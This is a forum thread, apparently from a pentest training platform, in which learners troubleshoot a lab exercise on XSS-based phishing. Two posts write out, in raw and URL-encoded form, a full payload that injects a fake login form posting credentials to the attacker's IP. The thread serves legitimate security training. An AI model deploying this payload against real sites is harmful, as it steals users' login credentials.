Cross-Site Scripting (XSS) Module: "Issue in sending URL!" at the Phishing Section

[SPOILERS ALERT!] Hello! Newbie here trying to learn some pentest tools with the academy. First post :slight_smile:

I am stuck in the exercise of the Phishing section. I have managed to set up the PHP server and the payload that connects to the server. The resultant URL is

https://SERVER-IP/phishing/index.php?url='/><script>document.write('<h3>Please login to continue</h3><form action=http://MY-IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--

with SERVER-IP being the HTB machine’s, and MY-IP being my tun0 IP. When I open the link and fill the forms and press enter, my PHP server successfully receives the login details and everything behaves as expected.

The problem is that when I go to https://SERVER-IP/phishing/send.php, paste the mentioned link and press “Send”, the page shows “Issue in sending URL!” and nothing reaches my PHP server.

I have tried URL encoding, with the same result.

Is there something obvious I am missing?

Thanks a lot for any help! :slight_smile:

Try PHP server with 443.

Thanks for the help! It wasn’t the port, but found the solution anyway. Had to encode the URL, and send HTTP (not https).

I ran into the same issue, but mine had a different cause/solution.

For anyone in the future that gets the “Issue in sending URL!”, double check to make sure the payload you send is exactly what the material provides. Seems a little obvious in hindsight, but I wasted a good bit of time over a “lab-ism” that wouldn’t have mattered in a “real-world” instance; hopefully I can save someone else some trouble. :slight_smile:

Thanks for this! It was the url encoding that got me.

thanks so much, explanation was helpful, the encoding got me as well.

Has anyone done the skills assessment for that same module? If you have please dm me I can use some help. Also to the question on top try resetting the target IP. That’s the only thing I can think of.

for me this server was quite unstable and I needed to restart it very often.

do not forget test if your local server is accessible from the server ( local firewall settings )

My I tested the URL it worked my problem is setting up the server. I can’t connect to 0.0.0.0:80 because its already listening. I trying 8080, 8000, and 81, no of them gets a response. Did everyone use the 0.0.0.0:80 for the address?

[quote=“QuickFix914, post:9, topic:249212”]
Did everyone use the 0.0.0.0:80 for the address?[/quote]

I’m a dunce I got it. Going to my corner.

My script worked, and as everyone here, I’ve stumble upon the “Issue in sending URL!” error.
This what I’ve tried:

  1. Using ZAP browser.
  2. Installing and using Chrome browser.
  3. Using the payload of xlandrexl1 as CyberSecN00b said, as I’ve created a different script than the original.
  4. Encoding both payloads in 6 websites in case the issue was the server didn’t like the format.
  5. As my PHP server used port 8080 (couldn’t close 80, already in use by HTB’s pwnbox), so tried both payloads with :8080 removed from the URL in case the website didn’t like and although it made no sense.
  6. Finally, and this was the solution, I’ve noticed that the website might not like the encoding of the URL in only some parts (the ones related to the ‘useful’ URL) sos it didn’t realize it was a valid URL. So using the payload from xlandrexl1 as an example, it ended up like this:
    http://target.ip/phishing/index.php?url= http:/my.php.server.ip:8080

Hope this helps someone out there!

I’m sorry, it doesn’t allow me to put the correct sentence. What I meant was, you have to encode only the query parameters from the URL, so you would have:
http://target.ip/phishing/index.php?url= ENCODED URL PART http://my.php.server.ip:8080 ENCODED URL PART

1 Like

This scenario is really starting to bother me, and surely there is a better way HTB could check for correct solutions. Like most people above I have a working solution that is as far as I can tell EXACTLY what the material provided.

http://TARGET IP/phishing/index.php?url='/%3E%3Cscript%3Edocument.write('%3Ch3%3EPlease%20login%20to%20continue%3C/h3%3E%3Cform%20action=http://MY IP:88%3E%3Cinput%20type=%22username%22%20name=%22username%22%20placeholder=%22Username%22%3E%3Cinput%20type=%22password%22%20name=%22password%22%20placeholder=%22Password%22%3E%3Cinput%20type=%22submit%22%20name=%22submit%22%20value=%22Login%22%3E%3C/form%3E');document.getElementById('urlform').remove();%3C/script%3E%3C!--

Naturally, port 80 is in use so the php server is running on port 88, other than that I cant see any difference. I’ve tried encoding in different ways, using different ports, using burp to send the link in more specific ways like wrapping the address in HTML hyperlink tags.

Could someone please just post a working link so I can understand the awful specific formatting?

UPDATE: My solution is correct, it now inexplicably works, HTB is just garbage.

Thnx, that helped a lot. I’m really soldiering through and get most of it myself and don’t mind spending hours/days searching for answers but having a working scenario/link and having it rated incorrect because of encoding issues of parts of the URL is really too much imo of what can be expected. Thanks a heap :).